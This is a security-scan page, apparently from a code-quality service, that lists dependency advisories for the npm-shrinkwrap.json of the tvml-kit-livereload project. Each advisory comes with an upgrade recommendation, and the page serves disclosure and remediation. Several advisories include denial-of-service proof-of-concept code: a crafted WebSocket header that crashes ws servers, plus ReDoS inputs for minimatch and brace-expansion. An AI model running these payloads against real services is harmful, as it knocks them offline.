Sign upLogin

hypery2k/tvml-kit-livereload

View on GitHub
Star
npm-shrinkwrap.json

Summary

Maintainability
Test Coverage

ws Denial of Service
Open

    "ws": {
      "version": "1.1.1",
      "from": "ws@1.0.1",
      "resolved": "https://registry.npmjs.org/ws/-/ws-1.0.1.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Denial of Service

Overview:

A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

Proof of concept:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation:

Upgrade to version 3.3.1 or greater

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "0.3.0",
              "from": "minimatch@>=0.3.0 <0.4.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

minimatch Regular Expression Denial of Service
Open

        "minimatch": {
          "version": "0.4.0",
          "from": "minimatch@>=0.0.0 <1.0.0",
          "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.4.0.tgz"
        }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

debug Regular Expression Denial of Service
Open

            "debug": {
              "version": "0.7.4",
              "from": "debug@0.7.4",
              "resolved": "https://registry.npmjs.org/debug/-/debug-0.7.4.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

growl Command Injection
Open

    "growl": {
      "version": "1.7.0",
      "from": "growl@>=1.7.0 <1.8.0",
      "resolved": "https://registry.npmjs.org/growl/-/growl-1.7.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Command Injection

Overview:

Growl adds growl notification support to nodejs.

Growl does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.

Recommendation:

Update to version 1.10.2 or greater

brace-expansion ReDoS
Open

    "brace-expansion": {
      "version": "1.1.5",
      "from": "brace-expansion@>=1.0.0 <2.0.0",
      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.5.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example,{1,2,3,4} would expand to 1 2 3 4. brace expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation:

Upgrade to version 1.1.7 or later.

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@2.2.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "0.3.0",
              "from": "minimatch@>=0.3.0 <0.4.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz"
            }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

minimatch Regular Expression Denial of Service
Open

        "minimatch": {
          "version": "0.2.14",
          "from": "minimatch@>=0.2.9 <0.3.0",
          "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-0.2.14.tgz"
        }
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation:

Updated to version 3.0.2 or greater

parsejson Regular Expression Denial of Service
Open

    "parsejson": {
      "version": "0.0.1",
      "from": "parsejson@0.0.1",
      "resolved": "https://registry.npmjs.org/parsejson/-/parsejson-0.0.1.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The parsejson module is vulnerable to regular expression denial of service when untrusted user input is passed into it to be parsed.

Recommendation:

Until a fix is available do not use parsejson to parse json. Use JSON.parse() instead if available.

There are no issues that match your filters.

Category
Status